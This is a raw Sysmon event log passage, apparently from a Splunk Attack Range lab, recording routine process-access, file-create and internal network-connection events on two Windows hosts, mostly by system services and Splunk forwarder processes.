08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052197Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052196Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052195Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052194Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052193Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052192Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052191Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052190Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052189Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052188Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052187Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000809129Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:54.801{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D47DB4B0664F990B30C28103CE320F98,SHA256=9E84755E8130DCBCD519F17FC102BE059A54FC6E2AEAF5F8EE11F1ED549B994D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052330Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:54.729{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A401728FE4998CEAC93AC699F99C143,SHA256=5DB7335B9C4EB55D6D1A3CA0EF69A19363417E34345D6D82AB6611D49C53E9E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809128Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:52.728{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57375-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x80000000000000001052329Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:54.398{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=7BADD8F163132B258AE63E3DF093E46F,SHA256=30EB2C5A9BD37A0AEABADE0414FC451AB869687AFE81B7B1FA5ACD8508DFD7F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052328Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:54.398{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=D57914224154CE3647C0D7BB38C31B4A,SHA256=FC115FD537208E9A91C731051CDE316EF7ADFB89C8C312089D99E45097F36E77,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052327Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:54.261{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F6B6-60EB-AB7D-00000000CF01}7668C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052326Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:54.261{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052325Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:54.261{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052324Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:54.261{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052323Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:54.261{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052322Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:54.261{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F6B6-60EB-AB7D-00000000CF01}7668C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052321Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:54.261{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F6B6-60EB-AB7D-00000000CF01}7668C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052320Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:54.247{466BC892-F6B6-60EB-AB7D-00000000CF01}7668C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001052319Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:54.130{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3E3818E6CC0C8E9CE37132EF6E691D66,SHA256=A02E522296847B64361D07A56876EF30ED5B8F46A4EC31F4EC0CC7C8D2AF8B0B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052318Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:54.030{466BC892-F6B5-60EB-AA7D-00000000CF01}82809932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052332Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:55.760{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FFE15FD32ABDC49FB511AF8F57BB9DF,SHA256=3C9FA7903BC37615C8BE50E06C8DA2BC6C12AC20FB43D1F617C8920E4C85CAC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809130Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:55.802{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2206BF8E9719F356F5A946A4D718E44,SHA256=CD802931070014D1723D86C252E04CBD2ABB79F642B986DF08BD0B243C2438A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052331Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:55.260{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=77BA369E5AD03C17CB47597754D642BA,SHA256=C109DFD5F02395399A0B95C8C987611CD4ABE8BE9D6FB944E82BDEA1EC9DC92C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052333Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:56.780{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F7904FD51CCF64EB3DC77BF61011B77,SHA256=100A3FECFAADA51B4BB4C2FA22E64DCE5E7F87CDF0FAF614DE0233D597CAAD88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809131Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:56.831{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBCC689922F6AC3AB8FC79390C5DD5FF,SHA256=F57231E820DA601389B54D6ACF8F6DCFC8D295B8F80E03D4B54413CE9B022A34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052335Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:57.795{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FBA27519663C9EDCF213ECC1F3417CF,SHA256=217FDE936EE3ABE7175A006C9810EF3B5F064677AFFDE5E3CEF37F9B57C542FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809133Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:57.853{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5C7EFB431F5396B9032E3CDFC0B6FF3,SHA256=31F1045B3006725610306000D34EBD8516264ADC8F72AC6D0585879AA0D002B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052334Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:57.211{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809132Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:00:55.340{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57376-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809134Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:58.870{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF936B9AEB124B805D7CC624C003E74C,SHA256=55BA3C13AD823489CC11F4E64443FF50B5D742B1E97BCEEC6E1C4143F524574D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052338Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.730{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51152-false10.0.1.12-8089- 23542300x80000000000000001052337Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:58.825{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 